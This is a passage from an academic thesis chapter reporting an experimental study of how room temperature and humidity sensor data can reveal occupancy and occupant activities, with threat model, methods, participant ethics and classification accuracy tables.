intrusion detection system that shall protect against such attacks. Due to the properties of wireless communication, this ubiquitous medium is hard to manage and to control, as well as attackers have access to it. Siby et al. [270] proposed the concept of a passive system for the monitoring of the wireless traffic generated by IoT objects. Using this system, one should be able to identify present IoT objects, communicating parties and patterns, which should also enable the detection of malicious events within wireless networks. In Chapter 5, we present a case study in which the security of a popular smart home standard for IoT consumer products is analyzed. The results show that we can take over IoT objects wirelessly as the specific standard lacks comprehensive security measures and proves to be insecure by design.

29 30 Chapter 3

Privacy Implications of Room Climate Data

IoT applications collect, store, and process massive amounts of data to enable their “smart” capabilities. Although this data collection is required for proper function, there is also a potential for misuse when collected data can be accessed by unauthorized parties or is utilized for unintended usage. In this chapter, we present a case study on the threat of data leakage that focuses on privacy implications concerning room climate data.

Contents

3.1 Introduction ...... 32 3.2 Threat Model ...... 34 3.3 Experimental Design and Methods ...... 35 3.3.1 Experimental Setup and Tasks ...... 35 3.3.2 Sensor Data Collection ...... 37 3.3.3 Experimental Procedure ...... 38 3.3.4 Participants and Ethical Principles ...... 39 3.3.5 Classifier Design ...... 39 3.4 Results ...... 40 3.4.1 Visual Inspection ...... 40 3.4.2 Occupancy Detection ...... 42 3.4.3 Occupancy Estimation ...... 42 3.4.4 Activity Recognition ...... 43 3.4.5 Multi-Sensor Classification ...... 45 3.5 Further Observations ...... 46 3.5.1 Length of Measurement Windows ...... 47 3.5.2 Selected Features ...... 47 3.5.3 Size and Layout of Rooms ...... 48 3.5.4 Position of Sensors ...... 48 3.6 Discussion ...... 48 3.6.1 Privacy Implications ...... 49 3.6.2 Location-Independent Classification ...... 49 3.6.3 Policy Implications ...... 50 3.7 Related Work on Occupancy Detection and Activity Recog- nition ...... 51 3.8 Conclusion ...... 51

31 3 Privacy Implications of Room Climate Data

3.1 Introduction

The vision of the IoT is to enhance work processes, energy efficiency, and living comfort by interconnecting actuators, mobile devices and sensors. These networks of embedded technologies enable applications such as smart heating, home automation, and smart me- tering, among many others. Sensors are of crucial importance in these applications. Data gathered by sensors is used to represent the current state of the environment, for in- stance in smart heating, sensors measure the room climate. Using these information and a user-defined configuration of the targeted state of room climate, the application regulates heating, ventilation, and air conditioning. While the collection of room climate data is obviously essential to enable smart heating, it may at the same time impose the risk of privacy violations. Consequently, it is commonly believed among security experts that leaking room climate data may result in privacy violations and hence that the data needs to be cryptographically protected [78]. However, these claims have not been supported by scientific evidence so far. Thus, one could question whether in practice additional effort for protecting the data would be justified. The current situation with room climate data is comparable to the area of smart meter- ing [119, 319, 142, 164]. In 1989, Hart [119] was the first to draw attention to the fact that smart metering appliances can be exploited as surveillance devices. Since then, research has shown far-reaching privacy violations through fine-granular power consumption mon- itoring, ranging from occupancy and everyday activities detection [207] up to recognizing which program a TV was displaying [112]. Various techniques have been proposed over the years to mitigate privacy risks of smart metering [39, 246, 143, 319, 245]. This issue has become such a grave concern that the German Federal Office for Information Security published a protection profile for smart meters in 2014 [85]. By considering privacy im- plications of smart heating, we hope to initiate consumer protection research and policy debate in this area, analogous to the developments in smart metering described above. In this chapter we investigate room climate data from the perspective of possible privacy violations. More precisely, we address the following research questions:

• Occupancy detection: Can an attacker determine the presence of a person in a room using only room climate data, i.e., temperature and relative humidity?

• Occupancy estimation: Can an attacker determine the number of persons present in a room using only this room climate data?

• Activity recognition: Can an attacker recognize activities of the occupant in the room using only the temperature and relative humidity data?

Our threat scenario targets buildings with multiple rooms that are similar in size, layout, furnishing, and positions of the sensors. These properties are typical for office buildings, dormitories, cruise ships, and hotels, among others. Assuming that an attacker is able to train a classifier that recognizes pre-defined activities, possible privacy violations are,

32 3.1 Introduction e.g., tracking presence and working practices of employees in offices, or the disclosure of lifestyle and intimate activities in private spaces. All these situations present intrusions in the privacy of the occupants. In contrast to surveillance cameras and motion sensors, the occupant does not expect to be monitored. Also, legal restrictions regarding privacy might apply to surveillance cameras and motion sensors but not to room climate sensors.

To evaluate these threats, we present experiments that consider occupancy detection, occupancy estimation, and activity recognition based on the analysis of room climate data from a privacy perspective. We measured room climate data in three office-like rooms and distinguished between the activities reading, standing, walking, and working on a laptop. The data was collected from sensors that measure temperature and relative humidity at a regular time interval of a few seconds. Reflecting the most restrictive scenario, we analyzed how much information can be derived from the measurements of a single sensor only. Although we assume that in smart heating applications, only one sensor per room is most likely to be installed, each room was equipped with several sensors in order to evaluate any impact of the position of the sensor in the room. Additionally, we combined and evaluated data from two sensors simultaneously to investigate whether increasing the available data affects classification noticeably.

In our procedure, occupants performed a pre-defined sequence of tasks in the experimental space. In sum, we collected almost 115 hours of room climate sensor data from a total of 36 participants. The collected room climate data was analyzed using an off-the-shelf machine learning classification algorithm.

Evaluating our collected room climate data, the attacker detects presence of a person with detection rates up to 93.5% depending on location and the sensor position, which is significantly higher than guessing (50%). Discriminating between one and two persons present in the room is not a similarly easy task for the attacker as classification results are not above 68% and some are around 48%, which is in the region of guessing (50%). Consequently, differentiating between absence, presence of one, and of two persons yields results lying in between these two with rates up to 72.2%. The attacker can distinguish between four activities (reading, standing, walking, and working on a laptop) with detec- tion rates up to 56.8%, which is also significantly better than guessing (25%). We can also distinguish between three activities (sitting, standing and walking) with detection rates up to 81.0%, as opposed to 33.3% if guessing. Furthermore, we distinguish between standing and walking with detection rates up to 96.3%. Additionally, evaluating the performance of pairs of sensors predominantly shows an increase of detection rates. However, the exact difference fluctuates from almost none to approximately 10%. Thus, we show that the fears of privacy violation by leaking room climate data are well justified. Furthermore, we analyze the influence of the room size, positions of the sensor, and amount of the mea- sured sensor data on the accuracy. In summary, we provide the first steps in verifying the common belief that room climate data leaks privacy-sensitive information.

The remainder of this chapter is organized as follows. Section 3.2 presents the threat model considered in this work. In Section 3.3, we introduce the experimental design and

33 3 Privacy Implications of Room Climate Data methods. The results and complementary observations of our experiments are presented and discussed in Sections 3.4 to 3.6, respectively. In Section 3.7, we give an overview of related work. We draw conclusions in Section 3.8.

3.2 Threat Model

The overall goal of our work is to understand the potential privacy implications if room climate data is accessed by an attacker. The attacker’s goal is to gain information about the state of occupancy, i.e., if and how many persons are present in the room, as well as the activity of the occupants without their consent. Obviously, the more information an attacker can gather, the more likely she can deduce privacy-harming information from the measurements. However, in practice only few sen- sors will be installed within one room, especially as one sensor node per room is sufficient to monitor the room climate, and these sensors will measure a very limited set of data only. Therefore, we base our analysis on the attacker model that considers a room climate system where only few sensor nodes are used and only basic data is measured. That is, the main focus of our experiments will be on the case that only one single sensor is present. If it turns out that a single sensor already provides sufficient data to derive privacy-harming information about the occupants, situation may get even worse when more sensors are accessible. To examine this, we will also consider the case that an attacker can make use of the measurements of two different sensors to analyze if and how much the attacker performs better compared to the 1-sensor-case. In out threat model, we assume that this sensor node takes only the two most basic mea- surements, temperature and relative humidity. These data are the fundamental properties to describe room climate. Note that our restricted data is in contrast to existing work (cf. Table 3.7 and Section 3.7) that based their experiments on more types of measurements or used data that is less common to characterize room climate.

We consider a sensor system that measures the climate of a room, denoted as target location. At the target location, temperature and relative humidity sensors are installed that report the measured values in regular intervals to a central database. We consider an attacker model where the attacker has access to this database and aims to derive information about the occupants at the target location. Furthermore, we assume that the attacker has access to either the target location itself, or rooms similar in size, layout, sensor positions, and furniture. Such situations are given, for example, at office buildings, hotels, cruise ships, and student dormitories. These locations, denoted as training location, is used to train the classifier, which is a machine learning algorithm learning the input data labeled with the ground truth. As the attacker has full control over the training location, she can freely choose what actions are taking place during the measurements. For example, she could do measurements while no persons are present at the training location, or some persons are present and execute predefined activities.

34 3.3 Experimental Design and Methods

There are various scenarios, in which an attacker has incentives to collect and analyze room climate data. For example, the management of a company aims at observing the presence and working practices of employees in the offices. In another case, a provider of private spaces (hotels, dormitories, etc.) wants to disclose lifestyle and intimate activities in these spaces. This information may be utilized for targeted advertising or sold to insurance companies. In any case, the evaluation of room climate data provides the attacker with the possibility to undermine the privacy of the occupants. The procedure of these attacks is as follows: First, the attacker collects training data at a training location, which might be the target location or other rooms similar in size, layout, sensor positions, and furniture. The attacker also records the ground truth for all events that shall be distinguished. Examples of events are number of persons present in the room (including the case that the room is empty), or different activities such as working, walking, and sleeping. The training data is recorded with a sample rate of a few seconds and split into windows (i.e., a temperature curve and a relative humidity curve) of same time lengths, usually one to three minutes. Using the collected training data, the attacker trains a machine learning classifier. After the classifier is trained, it can be used to classify windows of climate data from the target location to determine the events. The classifier works on previously collected data, thus reconstructing past events, and also on live-recorded data, thus determining current events “on-the-fly” at the target location.

3.3 Experimental Design and Methods

We conducted a study to investigate the feasibility of detecting and estimating occupancy as well as inferring activities in an office environment from temperature and relative humid- ity. From March to April 2016, we performed experiments at two locations simultaneously, Location A and Location B, with a distance of approximately 200 km between them. In addition, from January to February 2017, we conducted further experiments at a third location, denoted as Location C, which is located in the same building as Location B.

3.3.1 Experimental Setup and Tasks

The experimental spaces at the three locations are different in size, layout, and positions of the sensors. Thus, each target location is also the training location in our study. At Location A, the room has a floor area of 16.5 m2 and was equipped with room climate sensors at four positions as shown in Figure 3.1ii. At Location B, the room has a floor area of 30.8 m2, i. e., roughly twice as much as at Location A, and had room climate sensors installed at three positions as illustrated in Figure 3.1i. Location C has a floor area of 13.9 m2 and was equipped with room climate sensors at five positions as shown in Figure 3.1iii. In all locations, the room climate sensors measured temperature and relative humidity. The number of deployed sensors varied due to limitations of hardware availability.

35 3 Privacy Implications of Room Climate Data

1m h: 1.2m B2 Cup- Door Desk Desk board N Desk

B1 B3 h: 2.8m h: 2.2m

Desk Desk Table

Windows (i) Location B (30.8 m2) 1m h: 1.18m 1m N A4 h: 1.65m h: 1.14m N Desk C3 C4 A2 Shelf Desk h: 0.91m

A1 C1 h: 2.88m Door Door h: 2.87m Windows Windows h: 1.83m Desk C2 h: 1.83m C5 Shelf Pillar h: 2.25m Desk Shelf A3 (iii) Location C (13.9 m2) (ii) Location A (16.5 m2) Figure 3.1: Floor plans of the experiment spaces including sensor node locations, h indi- cates the node’s height.

Our goal was to determine to which extent the presence and activities of occupants influ- ence the room climate data. Therefore, we measured temperature and relative humidity during phases of absence as well as phases of presence. If occupants were present, these persons had to perform one task or a sequence of tasks. We defined the following experi- mental tasks (see also Figure 3.2):

• Read: Sit on an office chair next to a desk and read. • Stand: Stand in the middle of the room, try to avoid movements. • Walk: Walk slowly and randomly through the room. • Work: Sit on an office chair next to a desk and use a laptop, which is located on the desk.

36 3.3 Experimental Design and Methods

(a) Read (b) Stand (c) Walk (d) Work Figure 3.2: The defined tasks performed by participants at Location A.

To eliminate confounding factors, we defined location default settings applying to all locations. Essentially, all windows were required to remain closed and no person was allowed in the room when not in use for the experiment. The rooms have radiators for heating, which were adjusted to a constant level. At Location A and B, we used shutters fixed in such positions that enough light was provided for reading and working.

3.3.2 Sensor Data Collection

We used a homogeneous hardware and software setup at all locations for data collection, which is described in the following.

Hardware. At each location, we set up a sensor network consisting of several Moteiv Tmote Sky sensor nodes with an integrated IEEE 802.15.4-compliant radio [216] as well as an integrated temperature and relative humidity sensor. The nodes have the Contiki operating system [68] version 2.7 installed. In addition, we deployed a webcam that took pictures in a 3-second interval at Location A. These were used for verification during the data collection phase only, and were not given to the classification algorithms.

Software. For sensor data collection, we customized the Collect-View application in- cluded in Contiki 2.7, which provides a graphical user interface to manage the sensor network. For our purposes, we implemented an additional control panel offering a cus- tomized logging system. The measurement settings of the Collect-View application were set to a report interval of 4 seconds with a variance of 1 second, i. e., each sensor node reported its current values in a time interval of 4 ± 1 seconds. The variance is a fea- ture provided by Collect-View to decrease the risk of packet collisions during over-the-air transmissions.

Collected Data. We structured data collection in units and aimed for a good balance between presence and absence as well as the different tasks among all units, as this is needed for the later analysis using machine learning. Each unit has a fixed time duration,

37 3 Privacy Implications of Room Climate Data t, where exactly one or two persons were present (t ∈ {10, 30, 60}, in minutes) who exe- cuted predefined activities. In the presence of two occupants, both performed the same activities simultaneously, which allows to investigate whether it is possible to distinguish the number of persons in a room. If the presence time was t minutes, then the absence time before and after it, respectively, was determined as t + 5 minutes, where 5 minutes served 2 as buffer. This accounts for both, the equal distribution of presence time and absence time, respectively, and the fact that temperature and humidity settle within a 15-minute period after the 60-minute presence of one person. In Section 3.3.3, we present a detailed description of the experimental procedure. Overall, we collected around 115 hours of sensor data, 66 hours with at least one person being present. A more extensive overview of the amount of measured sensor data is shown in Table 3.1. To encourage replication and further investigations, all collected sensor data is available as open data sets on GitHub.1

Table 3.1: Measured sensor data of all locations (in hours) Recorded Time [h] Variable Value Location A Location B Location C 0 20:38:26 15:21:00 13:21:42 Occupancy 1 14:41:56 11:33:06 13:44:29 2 14:51:05 11:41:22 - Read 4:46:13 2:56:44 3:19:47 Stand 2:45:27 2:34:20 3:28:27 Task (one occupant) Walk 2:43:53 2:37:12 3:20:05 Work 4:03:33 3:00:20 3:20:52 Read 4:26:43 2:58:43 - Stand 2:51:08 2:37:11 - Task (two occupants) Walk 2:43:23 2:38:20 - Work 4:27:57 2:58:24 -

3.3.3 Experimental Procedure

The participants were assigned to at least one experimental unit with fixed presence times and tasks, and provided with a script for their actions (that is, for how long and in which order the tasks should be performed). Every participant performed each unit twice, with the same tasks, but possibly on different days and in a permuted chronological order. Tasks were performed in blocks of 10, 20, or 30 minutes. Thus, 10-minute units contained only one task of 10 minutes; 30-minute units consisted of either three tasks of 10 or one

1 https://github.com/IoTsec/Room-Climate-Datasets

38 3.3 Experimental Design and Methods task of 10 plus one of 20 minutes; 60-minute units were composed of either two tasks of 20 plus two of 10, or one task of 10, 20, and 30 minutes each. At the beginning of the presence time for each unit, i.e., the time period where one or two persons had to be present, the experimental supervisor unlocked the room door to let the participants in. The participants started with the first task and were instructed by phone (at Locations A and C) or through the glass pane (at Location B) when it was time to change activities or to leave the room.

3.3.4 Participants and Ethical Principles

For participating in the experiment, 14 subjects volunteered at Location A, 12 subjects at Location B, and 10 subjects at Location C as shown in Table 3.2.

Table 3.2: Demographic data of participants, µ denotes the average, σ denotes the standard deviation. Location Characteristic ABC female 3 2 5 Gender male 11 10 5 74 9 81 7 63 1 Weight [kg] µ . . . σ 8.0 12.1 10.0 175 9 178 4 170 7 Height [cm] µ . . . σ 9.2 5.3 9.3 33 7 30 3 25 6 Age µ . . . σ 8.2 4.8 2.8

Demographic data of participants was collected in order to facilitate replication and future experiments. All subjects provided written informed consent after the study protocol was approved by the data protection office.2 We assigned each participant to a random ID. All collected sensor data as well as the demographic data is only linked to this ID.

3.3.5 Classifier Design

We used classification to predict occupancy and activities in the rooms. We adopt an approach that has successfully been used in several applications of biosignal processing, namely extraction of a number of statistical descriptors with subsequent feature selec- tion [144, 133].

2 Ethical review boards at both locations only consider medical experiments.

39 3 Privacy Implications of Room Climate Data

The features use measurements from short time windows. We experimented with windows of different lengths, namely 60 s, 90 s, 120 s, 150 s, and 180 s. The offset between two consecutive windows was set to 30 s. We excluded all windows where only a part of the measurements belongs to the same activity. The feature set was composed from a number of statistical descriptors that were computed on temperature and humidity measurements within these windows. These are mean value, variance, skewness, kurtosis, number of nonzero values, entropy, difference between maxi- mum and minimum value of the window (i.e., value range), correlation between tempera- ture and humidity, and mean and slope of the regression line for the measurement window before the current window. Additionally, we subtracted from the measurements their least- square linear regression line, and computed all of the listed statistics on the subtraction residuals. Feature selection was performed using a sequential forward search [311, Ch. 7.1 & 11.8], with an inner leave-one-subject-out cross-validation [120, Ch. 7] to determine the performance of each feature set. For classification, we used the Na¨ıve Bayes classifier. To avoid a bias in the results, we randomly selected identical numbers of windows per class for training, validation, and testing. For implementation, we used the ECST software [247], which wraps the WEKA library [115]. As performance measures, we use accuracy (i. e., the number of correctly classified windows divided by the number of all windows), and per-class sensitivity (i. e., the number of correctly classified windows for a specific class divided by the number of all windows of this class). Classification accuracy was deemed statistically significant if it was significantly higher than random guessing which the best choice is if the classifier could not learn any useful information during training. For each experiment, a binomial test with significance level p < 0.01 was carried out using the R software [238]. Note that neither the features nor the rather simple Na¨ıve Bayes classifier are particularly tailored to predicting privacy leaks. However, we show that also such an unoptimized system is able to correctly predict occupancy and action types and hence produce privacy leaks. Higher detection rates results can be expected if more advanced classifiers are applied to this task.

3.4 Results

In this section, we present the experimental results. First, a visual inspection of the collected data is presented, followed by the machine learning-aided occupancy detection and estimation, and activity recognition using one or two sensors.

3.4.1 Visual Inspection

We started our evaluation by analyzing the raw sensor data. Hence, we implemented a visualization script in MATLAB, which plots this data. The visualizations of two mea- surements are exemplarily depicted in Figure 3.3.

40 3.4 Results

Temperature (Sensor A1) 20.9 Stand Read Walk Read Walk 20.8 20.7 20.6 temperature (°C) 0 600 1200 1800 2400 3000 3600 4200 4800 5400 6000 6600 7200 7800 8400 time (s) Relative Humidity (Sensor A1) 47

46

45 Stand Read Walk Read Walk humidity (%) 44 0 600 1200 1800 2400 3000 3600 4200 4800 5400 6000 6600 7200 7800 8400 time (s) (a) Occupant is present for 60 minutes at Location A.

Temperature (Sensor B2) 23.4 Stand Work Walk 23.2

23 temperature (°C) 0 600 1200 1800 2400 3000 3600 4200 4800 5400 6000 6600 7200 7800 8400 time (s) Relative Humidity (Sensor B2)

52

50

48

humidity (%) Stand Work Walk

0 600 1200 1800 2400 3000 3600 4200 4800 5400 6000 6600 7200 7800 8400 time (s) (b) Occupant is present for 60 minutes at Location B.

Figure 3.3: Visualization of two examples of room climate measurements. The grey back- ground indicates the presence of the occupant in the experimental space.

The visualizations show an immediate rise of the temperature and humidity as soon as an occupant enters the room. Furthermore, variations in temperature and humidity increase rapidly and can be clearly seen. Thus, one can visually distinguish between phases of occu- pancy and non-occupancy. One can also notice different patterns during the performance of the tasks. As Figure 3.3a shows, an occupant walking in the experimental space causes a constant increase of temperature and humidity with only small variations. In contrast, an occupant standing in the room causes the largest variations of humidity compared to the other defined tasks (cf. Figure 3.3b). The effects of the tasks reading and working on temperature and humidity in the depicted figures are very similar: both variables tend to increase showing medium variations. For further analysis of the data, we used machine learning as outlined in Section 3.3.5.

41 3 Privacy Implications of Room Climate Data

3.4.2 Occupancy Detection

Occupancy detection describes the binary detection of occupants in the experimental space based on features from windows with length of 180 seconds (cf. Section 3.3.5). This is a two-class task, namely to distinguish whether an occupant is present (true) or not (false). We only considered training and testing data within the same room (but separated training and testing both by the days and participants of the acquisition). We randomly selected the same number of positive and negative cases from the data. Thus, simply guessing the state has a success probability of 50%. However, our classification results are considerably higher than that. Table 3.3 shows that the highest accuracies per location were 93.5% (Location A), 88.5% (Location B), and 91.0% (Location C). Considering all sensors of all three locations, detection accuracy ranges between 66.8% (Sensor B3) and 93.5% (Sensor A1) as shown in Figure 3.4a. All classification accuracies were statistically significantly different from random guessing. This indicates that an attacker can reveal the presence of occupants in a target location with a high probability.

Table 3.3: Classification accuracy for occupancy detection. Sensitivity [%] Guess Accuracy Scenario Sensor Occup. No Occup. [%] [%] A1 94.1 93.0 50.0 93.5 A2 94.5 85.0 50.0 89.7 A3 92.0 76.4 50.0 84.2 A4 77.8 79.1 50.0 78.4 B1 91.9 85.1 50.0 88.5 Occupancy B2 85.3 77.2 50.0 81.3 B3 69.7 63.9 50.0 66.8 C1 92.9 89.2 50.0 91.0 C2 89.9 87.4 50.0 88.6 C3 90.0 82.0 50.0 86.0 C4 89.8 87.6 50.0 88.7 C5 92.5 88.8 50.0 90.7 Notation: ‘Occup.’ - sensitivity for class occupancy, ‘No Occup.’ - sensitivity for class no occupancy, ‘Guess’ - probability of correct guessing, ‘Accuracy’ - classification accuracy

3.4.3 Occupancy Estimation

Results for detecting multiple persons are shown in Table 3.4. Here, we first restate the results for deciding whether a single person is in a room or not, denoted as “0-1 person?”. Then, we report the results for deciding whether one or two persons are in a room, denoted as “1-2 persons?”. In the third column, we report results on the joint

42 3.4 Results

Table 3.4: Occupancy detection and estimation accuracies for two- and three-class tasks at Locations A and B Sensor 0-1 Person? [%] 1-2 Persons? [%] 0-1-2 Persons? [%] A1 93.5 47.7 59.7 A2 89.7 47.8 58.7 A3 84.2 68.0 66.4 A4 78.4 48.2 54.9 B1 88.5 67.6 72.2 B2 81.2 60.7 60.3 B3 66.8 67.3 56.6 classification problem, denoted as “0-1-2 persons?”. While the first two columns cover two-class classification tasks (i. e., with guessing chance of 50%), the third column covers a three-class classification task (with guessing chance of 33.3%). Decisions whether a room is empty or occupied by a single person achieve relatively high accuracies, for some sensors, close to or even above 90%. However, the decision between one or two persons is much harder. At Location A, three out of four sensors perform around guessing chance, whereas at Location B, performances range in between 60% and 70%. The three-class task confirms these two initial results, lying between the well-discernible case of an empty room and the much harder case of determining the exact number of occupants. From an attacker’s perspective, deciding whether one or two persons are present in a target location is an ambiguous task.

3.4.4 Activity Recognition

Activity recognition reports the current activity of an occupant in the experimental space. The four activity tasks are described in Section 3.3.1. The recognition results for these tasks are shown in Figure 3.4.

Activity4 classifies between the activities Read, Stand, Walk, Work. As shown in Fig- ure 3.4b, the accuracy of recognizing activities achieved by the machine learning pipeline ranged from 23.9% (Sensor C1) to 56.8% (Sensor A1). Overall, the accuracy of Activity4 was statistically significantly better than the probability of guessing the correct task (25%) for 8 out of 12 sensors. Thus, the distinction between multiple activities is possible, but depends on the target location and the position of the sensor. In the next step, we investigated whether an attacker can increase the recognition accu- racies by distinguishing between a smaller set of activities. To this end, we combined two tasks to a meta task, e.g., the tasks Read and Work became Sit. The model Activity3 clas- sifies between the tasks Sit, Stand, and Walk. The probability of correct guessing is thus 33.3%. This model is typical to represent activities of an occupant in a private space or an

43 3 Privacy Implications of Room Climate Data

100 60 100 A1 C1 A1 A2 C5 B1 B1 C2C4 A3 C3 50 80 A1 80 B2 A4 B1 40 B3 60 C5 A2 B2 A2 C3 60 C3 B2 Accuracy [%] Accuracy [%] C5 Accuracy [%] 30 A3 B3 C4 A3 40 C2 A4 C2 A4 B3 C4 C1 C1 40 20 ABC ABC ABC Location Location Location (a) Occupancy (b) Activity4 (c) Activity3 (read, stand, walk, work) (sit, stand, walk)

90 80 100 C2 A1 A1 C3 80 A2 C5 B1 C5 70 A1 B1 B2 80 70 A4 C4 A2 B2 C5 A3 A3 A2 B2 B3 C4 B1 A4 60 A3 C1 60 C1 C1 A4 C3 60 C3

Accuracy [%] Accuracy [%] Accuracy [%] B3 C2 B3 C2 50 C4 50 40 ABC ABC ABC Location Location Location (d) Activity2 (e) Activity2a (f) Activity2b (sit, upright) (read, work) (stand, walk)

Figure 3.4: Classification accuracy for occupancy detection and activity recognition. In each diagram, the guessing probability is plotted as a line. Each symbol represents the accuracy that we achieved with a single sensor. A circle marks a statistically significant result, while an ‘x’ represents a statistically insignificant result. office room. For Activity3, the achieved accuracy ranged from 31.8% (Sensor C1) to 81.0% (Sensor A1). Our results were statistically significant for 10 out of the 12 sensors deployed in the three locations. Assuming a known layout of the target location, the attacker might be able to determine the position of the occupant in the space and infer activities such as watching TV, exercising, cooking or eating.

The model Activity2 classifies between the tasks Sit and Upright, whereby Sit is as pre- viously Read or Work, and Upright combines Stand and Walk. In this classification, the attacker distinguishes whether an occupant is at a certain posture. The model Activity2a classifies between the tasks Read and Work, and the model Activity2b classifies between the tasks Stand and Walk. Activity2a indicates that an attacker can even distinguish between the sedentary activities, such as reading a book or working on the laptop. In contrast, Ac- tivity2b shows that an attacker can differentiate between standing and moving activities.

44 3.4 Results

Thus, an attacker can detect movements at the target location. For Activity2, Activity2a, and Activity2b, the probability to guess the correct class is 50%. Using these models, the attacker can infer various work and life habits. For Activity2, our accuracy varies between 54.6% (Sensor C2) and 82.1% (Sensor A1), and all accuracies are statistically significant. For Activity2a, the lowest and highest accuracies were 54.2% (Sensor B3) and 76.6% (Sensor C2), respectively, which resulted in statistically significant results for 11 out of 12 sensors. For Activity2b, the achieved accuracy ranged from 53.3% (Sensor C4) to 95.1% (Sensor A1) and the results for 10 out of 12 sensors were statistically significant.

3.4.5 Multi-Sensor Classification

Another interesting question is whether the availability of data from multiple sensors from within a room can improve the prediction performance. To assess this question, we concatenated the feature vectors of two sensors prior to the classification. Consistently, the evaluation process was kept identical to the previous analyses.

Table 3.5: Occupancy detection and estimation accuracies for two- and three-class tasks at Locations A and B based on two sensors. Sensor Pair 0-1 Person? [%] 1-2 Persons? [%] 0-1-2 Persons? [%] A1-A2 96.3 (+2.8 / +6.6) 60.8 (+13.1 / +13.0) 68.1 (+8.4 / +9.4) A1-A3 93.9 (+0.4 / +9.7) 71.5 (+23.8 / +3.5) 75.7 (+16.0 / +9.3) A1-A4 94.2 (+0.7 / +15.8) 56.6 (+8.9 / +8.4) 69.0 (+9.3 / +14.1) A2-A3 90.1 (+0.4 / +5.9) 70.9 (+23.1 / +2.9) 74.5 (+15.8 / +8.1) A2-A4 87.8 (−1.9 / +9.4) 53.7 (+5.9 / +5.5) 61.2 (+2.5 / +6.3) A3-A4 84.8 (+0.6 / +6.4) 69.8 (+1.8 / +21.6) 70.6 (+4.2 / +15.7) B1-B2 91.7 (+3.2 / +10.5) 72.0 (+4.4 / +11.3) 75.1 (+2.9 / +14.8) B1-B3 89.6 (+1.1 / +22.8) 67.9 (+0.3 / +0.6) 71.7 (−0.5 / +15.1) B2-B3 83.4 (+2.2 / +16.6) 61.4 (+0.7 / −5.9) 64.8 (+4.5 / +8.2) The differences to the accuracies of single sensors are given in parentheses. For example, the accuracy when measuring with sensors A1 and A2 increases to 96.3%. When measuring with A1 only, the accuracy is 93.5% (cf. Table 3.3), which constitutes the difference of +2.8%. The difference to measuring with A2 only is +6.6%.

Table 3.5 shows the results for occupancy estimation by using a pair of sensors. Overall, the detection accuracies improve by several percent when combining the feature vectors of two sensors. However, distinguishing between one and two persons in a room is still a hard task, with accuracies ranging approximately between 50% and 70%. The three-class problem also slightly improves, but still, by far the most reliable classification task is to determine whether there is a person in the room at all, with almost all accuracies now in the range of 90% and above.

45 3 Privacy Implications of Room Climate Data

Table 3.6: Activity Recognition accuracies for all three locations based on a single sensor and on two sensors One Sensor [%] Two Sensors [%] Sensor Act.4 Act.3 Act.2 Act.2a Act.2b Sensor Pair Act.4 Act.3 Act.2 Act.2a Act.2b A1 56.8 81.0 82.6 57.5 96.3 A1-A2 50.2 75.4 83.1 74.8 91.0 A2 39.7 56.1 68.5 64.1 65.9 A1-A3 50.1 76.7 80.4 72.4 88.3 A3 32.7 47.2 66.7 60.3 68.7 A1-A4 54.5 79.0 83.0 67.3 89.4 A4 26.8 39.8 62.8 65.6 69.0 A2-A3 32.6 50.0 65.9 74.8 67.1 A2-A4 41.1 55.1 71.0 75.5 69.1 A3-A4 31.1 43.8 68.3 75.3 46.8 B1 55.1 76.0 75.6 63.4 71.5 B1-B2 52.7 77.0 80.0 70.1 86.0 B2 35.2 56.4 74.5 62.1 73.1 B1-B3 55.6 74.5 76.4 64.2 79.6 B3 33.3 39.5 63.9 50.9 62.2 B2-B3 39.3 54.5 72.1 59.8 62.7 C1 28.3 40.0 58.4 59.3 43.5 C1-C2 29.5 46.8 55.8 65.2 62.5 C2 25.8 41.7 60.0 71.6 55.3 C1-C3 38.8 52.5 60.2 63.8 76.9 C3 34.3 54.2 62.4 66.3 60.7 C1-C4 28.6 44.6 67.8 64.4 53.3 C4 25.1 36.8 62.6 66.1 53.3 C1-C5 36.6 52.4 68.5 64.1 65.4 C5 30.9 57.7 75.5 65.8 72.5 C2-C3 32.2 52.5 62.4 76.5 72.8 C2-C4 29.0 48.9 64.5 77.3 59.3 C2-C5 30.5 49.3 72.3 75.5 67.1 C3-C4 40.2 54.7 67.9 72.4 69.7 C3-C5 42.4 60.5 70.9 74.7 77.4 C4-C5 35.3 57.1 72.6 72.4 64.5

Table 3.6 shows the results for activity recognition. Results for a single sensor are shown on the left side, results for pairs of two sensors on the right side. Interestingly, classification of activities appears to be a similarly hard task for pairs of sensors as it is for single sensors: using the information from multiple sensors does not really improve the results for activity classification. One reason might be that the information between multiple sensors is correlated for this task, such that the addition of multiple sensors only enlarges the feature space, but does not add significant information. From a privacy perspective, however, this is somewhat soothing: although the achieved accuracies are in almost all cases well above guessing chance, it is apparently not a straightforward task to accurately predict the activity of a person in the room.

3.5 Further Observations

Besides the accuracies on occupancy detection and estimation, as well as activity recogni- tion, we made further observations that we present in this section.

46 3.5 Further Observations

3.5.1 Length of Measurement Windows

The length of the measurement windows influences the accuracy of detection. We eval- uated window sizes in the range between 60 and 180 seconds. Exemplarily, we analyzed the average accuracy of occupancy detection depending on the window size for all three locations. As shown in Figure 3.5, the accuracy increases with a longer window size. We achieved the best results with the longest window sizes of 180 seconds.

90 Location A Location B 85 Location C

80

75 Average Accuracy [%]

60 90 120 150 180 Window Size [s] Figure 3.5: Average accuracy over all sensors from each location for occupancy detection depending on the window size

This indicates that the highest accuracies are possible if longer time periods are considered. From a practical perspective, it is not advisable to extend the window size to a much larger duration than a few minutes since we assume that the performed activity is consistent for the whole duration of the window.

3.5.2 Selected Features

To assess the feasibility of an attacker that has only access to either temperature data or relative humidity data, we evaluated whether it might be enough to solely collect one type of room climate data. In the classification process, an attacker derives a set of features from temperature and relative humidity data and selects the best-performing features for each sensor and classification goal automatically (cf. Section 3.3.5). Analysis shows that features computed from temperature and relative humidity are of similar importance. In our evaluation, 57.9% of the selected features are derived from temperature measurements, and 52.3% from relative humidity measurements.3 We also compared the features in terms of differences between the three locations as well as differences between occupancy detection and activity recognition. In all these cases, there are no significant differences between the importance of temperature and relative humidity. An attacker restricted to either temperature or relative humidity data will perform worse than with both data.

3 Note that some features are based on both, temperature and relative humidity, which is why the sum of both numbers exceeds 100%.

47 3 Privacy Implications of Room Climate Data

3.5.3 Size and Layout of Rooms

